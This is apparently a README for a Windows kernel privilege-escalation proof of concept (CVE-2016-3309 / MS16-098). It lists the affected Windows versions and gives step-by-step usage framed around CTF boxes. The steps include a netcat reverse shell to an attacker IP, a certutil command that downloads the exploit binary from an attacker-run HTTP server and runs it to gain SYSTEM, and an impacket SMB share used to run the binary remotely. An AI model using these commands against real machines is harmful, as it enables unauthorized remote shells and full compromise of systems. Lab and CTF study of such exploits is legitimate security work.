| CVE / MS | Title | Vulns |
|---|---|---|
| CVE-2016-3309 / MS16-098 | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64,win_7 version_1511 arc_x86,win_server_2008 sp_2 arc_x86,win_10 sp_1 arc_x86,win_10 sp_1 arc_x64,win_server_2012 arc_x86,win_7 version_1607 arc_x64,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_server_2008 sp_2 arc_x64,win_7 arc_x64,win_8.1 arc_x86,win_7 arc_x86,win_7 version_1607 arc_x86,win_vista sp_2 arc_x86,win_server_2008 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 |
Important Note : This POC is only tested on Windows 8.1 x64 and Windows 2012 R2 x64. May not work on others. Do NOT try this POC from a Powershell Reverse Shell. if you are happened to be on a Powershell like I was then upload netcat binary and send a cmd shell to your local netcat listener :
.\nc64.exe <Your-Machine-IP> 9000 -e cmdUsually CTF boxes don't connect to Internet links so in that case download POC binary in your local machine from Here then start a python SimpleHTTPServer on port 8000. On the target machine :
certutil.exe -urlcache -split -f "http://<Your-Machine-IP>:8000/41020.exe" 41020.exe
.\41020.exeIf the program didn't hang, check whoami you are already System! Alternatively you can start a samba server on your local machine using impacket-smbserver
sudo impacket-smbserver myshare `pwd` -smb2and run the exe directly from network like this :
\\<Your-Machine-IP>\myshare\41020.exe